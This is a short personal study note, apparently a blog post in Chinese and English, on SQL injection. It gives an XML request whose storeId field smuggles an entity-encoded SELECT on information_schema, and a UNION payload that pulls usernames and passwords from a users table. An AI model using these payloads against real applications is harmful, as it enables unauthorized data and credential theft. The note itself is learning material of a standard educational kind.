SQL注入(個人筆記)

SQL注入(個人筆記)

一月 08, 2025 
1
SELECT * FROM information_schema.tables
1
2
3
4
<stockCheck>
    <productId>123</productId>
    <storeId>999 &#x53;ELECT * FROM information_schema.tables</storeId>
</stockCheck>

Retrieving data from other database tables

  • In cases where the application responds with the results of a SQL query, an attacker can use a SQL injection vulnerability to retrieve data from other tables within the database. You can use the UNION keyword to execute an additional SELECT query and append the results to the original query.

For example, if an application executes the following query containing the user input Gifts:

1
SELECT name, description FROM products WHERE category = 'Gifts'

An attacker can submit the input:

1
' UNION SELECT username, password FROM users--

This causes the application to return all usernames and passwords along with the names and descriptions of products.